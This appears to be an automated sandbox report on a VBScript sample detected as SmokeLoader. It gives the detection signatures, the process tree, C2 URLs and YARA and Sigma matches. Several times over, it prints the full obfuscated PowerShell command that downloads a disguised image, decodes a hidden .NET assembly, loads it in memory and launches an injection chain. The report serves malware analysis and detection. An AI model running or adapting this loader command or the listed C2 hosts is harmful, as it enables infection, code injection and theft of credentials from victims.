Windows Analysis Report
sweetnessgoodforgreatnessthingswithgood.tIF.vbs

Overview

General Information

Sample name:sweetnessgoodforgreatnessthingswithgood.tIF.vbs
Analysis ID:1586466
MD5:8ccd875893cd23b67d7c61ea735f5c52
SHA1:6171c7dd4f67a67fff0ca151c7e9a06104e00def
SHA256:16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392
Tags: SmokeLoader, vbs, user-lontze7
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6292 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 3824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 6080 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 7140 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 2508 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
            • WerFault.exe (PID: 2056 cmdline: C:\Windows\system32\WerFault.exe -u -p 2508 -s 696 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • explorer.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 3988 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • explorer.exe (PID: 5144 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • uahuajd (PID: 1652 cmdline: C:\Users\user\AppData\Roaming\uahuajd MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Source | Rule | Description | Author | Strings
00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source | Rule | Description | Author | Strings
11.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_5128.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell 
version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell 
version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", ProcessId: 6292, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 
'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5128, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3824, ProcessName: aspnet_compiler.exe
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\uahuajd, CommandLine: C:\Users\user\AppData\Roaming\uahuajd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\uahuajd, NewProcessName: C:\Users\user\AppData\Roaming\uahuajd, OriginalFileName: C:\Users\user\AppData\Roaming\uahuajd, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\uahuajd, ProcessId: 1652, ProcessName: uahuajd
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { 
[void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs", ProcessId: 6292, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion 
} else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { 
[void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

Data Obfuscation

